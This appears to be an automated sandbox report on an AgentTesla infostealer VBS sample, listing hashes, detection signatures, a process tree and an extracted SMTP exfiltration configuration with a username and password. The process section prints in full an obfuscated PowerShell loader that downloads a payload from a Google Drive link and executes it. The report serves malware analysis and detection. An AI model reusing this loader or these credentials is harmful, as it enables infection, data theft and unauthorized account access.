Analysis
-
max time kernel
143s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
09-05-2024 02:18
General
-
Target
f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd.vbs
-
Size
10KB
-
MD5
0ccafea880ed43555fdcba60edf93559
-
SHA1
01cb51d525785dd3a44f48e35a47044a8beb4d7e
-
SHA256
f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd
-
SHA512
37b8e04ab367816d9bab3087adf192cdbdbac99e49205cd7c89de1916a52f4457217995d18185c66a926a58e97c2be5aaeffc696b879f6e9101be88c3c29e84c
-
SSDEEP
192:bN5CdCtmn8iF5ofmmC3dFComvOLCem903ujbOaHRDj7LgvUku1sa6/69yc+A0:bqCtmNMhmVqlzLgXiAc+A0
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
-
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
-
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
-
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
-
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
-
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f56414caa063dd9e04d5fd62d570ce003b1b469d5320ff5df5c62a2ebfcdb5fd.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$udfrtes = 1;$Shellier='Su';$Shellier+='bstrin';$Shellier+='g';Function Braiserede($Tubularia){$Toluate=$Tubularia.Length-$udfrtes;For($Paatalerettighed=1;$Paatalerettighed -lt $Toluate;$Paatalerettighed+=2){$Othake+=$Tubularia.$Shellier.Invoke( $Paatalerettighed, $udfrtes);}$Othake;}function Thoughten($Ekspertliniens){. ($Senilism) ($Ekspertliniens);}$Spooling=Braiserede ' M oFzCiDl.lPa / 5F. 0 .( WGiDnTdBo wDs. NDTU A1,0H.P0V; FWLi nU6s4T;u xE6K4.; yr v,: 1R2 1 .N0S)T G eFcLkRoS/r2 0R1D0T0.1 0U1 LF iSr,e f,oHx / 1S2K1S.,0K ';$Dyrskuet=Braiserede 'IUSsie r -fA gPe nUtT ';$Upsettal=Braiserede 'Mh,t tspDss:K/,/ dBr.iKv.eT..gPoPoPgUlKeC.HcDo mC/ u,c.? eGx proFrRtA=IdVoBwHnblKo,a d &,iMdS= 1 KwsGB BEsIDSQ.v Z TSAAPAmPjAsLO kBoSf f,6 qS_ 9COVnMA,Q w L gFX ';$Ampullitis=Braiserede ' >R ';$Senilism=Braiserede ' iAe.xE ';$Idaline='Taskekrabbens';Thoughten (Braiserede ' SHeCt -DCCoCn.tUe.n t, - PFa tChB UT,:T\dPVr e f r i eMn d,s hUi.pS.ytPxFtu .-,V,aWlTu.e .$.I.d aBlni,n e ; ');Thoughten (Braiserede ' i f ( tAe s tP-Mp a.t h, PT : \,PIr.eSfNrAi eMnSdCsah.iDpS. t x,tF)m{Ee x i,tY}S;, ');$definitionsvinduerne = Braiserede 'DeEcFhNo C%aaMp,pPdOact,a,%K\TL.a nEdAm a,n.d eTnK..MPoVtT E& &s .e.c hFo $ ';Thoughten (Braiserede 'P$.g lRo bCa lS:PS eIrLv a.nPtSeTsMt e.lL=,(FcAmTdU ,/ cM T$ dKe.f,i n i tBiAo nEsUvGi n dNuReIrSnCeU)P ');Thoughten (Braiserede 'N$Tg l,o b a l,:,LTu f t aIr t eWrLs =B$ UDpSs,e tPt a li.Ss pKl i,t ( $DA,mKpFuSlOl.i.tIi s ) ');$Upsettal=$Luftarters[0];Thoughten (Braiserede 'P$Kg lUo,bPaSlA:FCDl.yAsRt,eTr,sT=SNOeLw -NO.bLj e.c tG S yFsWtSe m,.RNAe.tK..W.e,b CSloi.e nGtP ');Thoughten (Braiserede ',$OC,lDyAsStEeGr sR. HSe a d eSr.s [ $ D y,r s k.u.e.t.],= $ S p oSoAlki nUg. ');$Fremstillelser=Braiserede ' CElSy.sPt.e,r s .CDSoCwkn lNoJaHd,FFiHl eC( $ U.prsReSt tFaIlW,S$WHSo n.oSr,aTrSieuAmCs,) ';$Fremstillelser=$Servantestel[1]+$Fremstillelser;$Honorariums=$Servantestel[0];Thoughten (Braiserede ' $Sg lMoDb a lA:.UVn.t,rDa nMsAl a tSa,bPlSyU=N(BTHeUs t.- P a t h. S$FH,o,n o rUa rui,uDm,sI). ');while (!$Untranslatably) {Thoughten (Braiserede '.$Gg,l o bFa l,:FSfjrlDeSg rBu p.pAe,=,$TtFr uCel ') ;Thoughten $Fremstillelser;Thoughten (Braiserede ',SetUa,r,t.-SSjlseAe.pS F4E ');Thoughten (Braiserede 'B$ gSl o b a,lQ:PUMnCtCr aGnUsslAa,t aFbSlOyL=V(VTTeAs,t,-,PTa t,h. $.H o n oLraa rOi u mRsG) ') ;Thoughten (Braiserede ' $fgLl o.bOa l,:KL,oan,e,rTsK=,$ gal o b aHl :sNPo nCgCaBr r.u lpoPu,s,l y.1.6B2A+S+ %,$FLVuPfNt aMr,t e,r sU. c oTuFnQt. ') ;$Upsettal=$Luftarters[$Loners];}$Arkiverer=327870;$vidtbermt=26048;Thoughten (Braiserede 'F$,gElBo bUaAlD:RPSr e.sRbSyLtsi,c u=G G e t.-,CDo nTtKe n t, M$FHZo nLo.rTavr.i u mLs. ');Thoughten (Braiserede 'K$TgDl o b.aLlU:OLFrKe rkiKg ePsKtN C=K D[SSKyKsBtDe mR. CPoSnKvUe rOtV] :,:.F rVoOm.BPaUsReB6S4VSSt rLi.n,g ( $SP,r e s bPy,t iBcP)n ');Thoughten (Braiserede 'P$Lg l,o.b aclS: R,a,sCeBrVe.rG ,=m .[ S yRsTtSeSm,. T e xLtS..E,n c.oPdTiCnUgS]B:,:EACSCC I IS.,GNeTtcSEthr,i.n g,(G$DL rDeSr i g e s.t ) ');Thoughten (Braiserede 'P$ggLl oOb.aHlP: P.y oTp e rLi,cBaCrPd i tciFsO= $MR.a s.eMrEeSr,. s.uDb,sAtHr iRnMgB( $ AVr.kDi vFe r e rV,R$.vki dKt bCe,rSm,t,), ');Thoughten $Pyopericarditis;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Landmanden.Mot && echo $"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$udfrtes = 1;$Shellier='Su';$Shellier+='bstrin';$Shellier+='g';Function Braiserede($Tubularia){$Toluate=$Tubularia.Length-$udfrtes;For($Paatalerettighed=1;$Paatalerettighed -lt $Toluate;$Paatalerettighed+=2){$Othake+=$Tubularia.$Shellier.Invoke( $Paatalerettighed, $udfrtes);}$Othake;}function Thoughten($Ekspertliniens){. ($Senilism) ($Ekspertliniens);}$Spooling=Braiserede ' M oFzCiDl.lPa / 5F. 0 .( WGiDnTdBo wDs. NDTU A1,0H.P0V; FWLi nU6s4T;u xE6K4.; yr v,: 1R2 1 .N0S)T G eFcLkRoS/r2 0R1D0T0.1 0U1 LF iSr,e f,oHx / 1S2K1S.,0K ';$Dyrskuet=Braiserede 'IUSsie r -fA gPe nUtT ';$Upsettal=Braiserede 'Mh,t tspDss:K/,/ dBr.iKv.eT..gPoPoPgUlKeC.HcDo mC/ u,c.? eGx proFrRtA=IdVoBwHnblKo,a d &,iMdS= 1 KwsGB BEsIDSQ.v Z TSAAPAmPjAsLO kBoSf f,6 qS_ 9COVnMA,Q w L gFX ';$Ampullitis=Braiserede ' >R ';$Senilism=Braiserede ' iAe.xE ';$Idaline='Taskekrabbens';Thoughten (Braiserede ' SHeCt -DCCoCn.tUe.n t, - PFa tChB UT,:T\dPVr e f r i eMn d,s hUi.pS.ytPxFtu .-,V,aWlTu.e .$.I.d aBlni,n e ; ');Thoughten (Braiserede ' i f ( tAe s tP-Mp a.t h, PT : \,PIr.eSfNrAi eMnSdCsah.iDpS. t x,tF)m{Ee x i,tY}S;, ');$definitionsvinduerne = Braiserede 'DeEcFhNo C%aaMp,pPdOact,a,%K\TL.a nEdAm a,n.d eTnK..MPoVtT E& &s .e.c hFo $ ';Thoughten (Braiserede 'P$.g lRo bCa lS:PS eIrLv a.nPtSeTsMt e.lL=,(FcAmTdU ,/ cM T$ dKe.f,i n i tBiAo nEsUvGi n dNuReIrSnCeU)P ');Thoughten (Braiserede 'N$Tg l,o b a l,:,LTu f t aIr t eWrLs =B$ UDpSs,e tPt a li.Ss pKl i,t ( $DA,mKpFuSlOl.i.tIi s ) ');$Upsettal=$Luftarters[0];Thoughten (Braiserede 'P$Kg lUo,bPaSlA:FCDl.yAsRt,eTr,sT=SNOeLw -NO.bLj e.c tG S yFsWtSe m,.RNAe.tK..W.e,b CSloi.e nGtP ');Thoughten (Braiserede ',$OC,lDyAsStEeGr sR. HSe a d eSr.s [ $ D y,r s k.u.e.t.],= $ S p oSoAlki nUg. ');$Fremstillelser=Braiserede ' CElSy.sPt.e,r s .CDSoCwkn lNoJaHd,FFiHl eC( $ U.prsReSt tFaIlW,S$WHSo n.oSr,aTrSieuAmCs,) ';$Fremstillelser=$Servantestel[1]+$Fremstillelser;$Honorariums=$Servantestel[0];Thoughten (Braiserede ' $Sg lMoDb a lA:.UVn.t,rDa nMsAl a tSa,bPlSyU=N(BTHeUs t.- P a t h. S$FH,o,n o rUa rui,uDm,sI). ');while (!$Untranslatably) {Thoughten (Braiserede '.$Gg,l o bFa l,:FSfjrlDeSg rBu p.pAe,=,$TtFr uCel ') ;Thoughten $Fremstillelser;Thoughten (Braiserede ',SetUa,r,t.-SSjlseAe.pS F4E ');Thoughten (Braiserede 'B$ gSl o b a,lQ:PUMnCtCr aGnUsslAa,t aFbSlOyL=V(VTTeAs,t,-,PTa t,h. $.H o n oLraa rOi u mRsG) ') ;Thoughten (Braiserede ' $fgLl o.bOa l,:KL,oan,e,rTsK=,$ gal o b aHl :sNPo nCgCaBr r.u lpoPu,s,l y.1.6B2A+S+ %,$FLVuPfNt aMr,t e,r sU. c oTuFnQt. ') ;$Upsettal=$Luftarters[$Loners];}$Arkiverer=327870;$vidtbermt=26048;Thoughten (Braiserede 'F$,gElBo bUaAlD:RPSr e.sRbSyLtsi,c u=G G e t.-,CDo nTtKe n t, M$FHZo nLo.rTavr.i u mLs. ');Thoughten (Braiserede 'K$TgDl o b.aLlU:OLFrKe rkiKg ePsKtN C=K D[SSKyKsBtDe mR. CPoSnKvUe rOtV] :,:.F rVoOm.BPaUsReB6S4VSSt rLi.n,g ( $SP,r e s bPy,t iBcP)n ');Thoughten (Braiserede 'P$Lg l,o.b aclS: R,a,sCeBrVe.rG ,=m .[ S yRsTtSeSm,. T e xLtS..E,n c.oPdTiCnUgS]B:,:EACSCC I IS.,GNeTtcSEthr,i.n g,(G$DL rDeSr i g e s.t ) ');Thoughten (Braiserede 'P$ggLl oOb.aHlP: P.y oTp e rLi,cBaCrPd i tciFsO= $MR.a s.eMrEeSr,. s.uDb,sAtHr iRnMgB( $ AVr.kDi vFe r e rV,R$.vki dKt bCe,rSm,t,), ');Thoughten $Pyopericarditis;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Landmanden.Mot && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
460KB
MD59344dd070d1a8091bb0f6c5b7312678f
SHA1c0b15173f8f94727c76c7e850a6b8231fbda5ad4
SHA256cd1f782cb90ed5cce53779a1c0cc786f9f18f2f35e8fbf8279726a091298ab76
SHA512ae1afe3163026b7f87ea218b4c2b02ea5a56f93c56de4983a2c943051abd65c7317244dd7489d3477f70f004f1cc87fdb6e5042e46e3359d251a9c335092f93f
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
320KB
-
Filesize
256KB
-
Filesize
18.3MB
-
Filesize
6.5MB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
216KB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
44.9MB
-
Filesize
2.8MB
-
Filesize
2.8MB
-
Filesize
2.8MB
-
Filesize
2.8MB
-
Filesize
136KB
-
Filesize
2.8MB
-
Filesize
2.8MB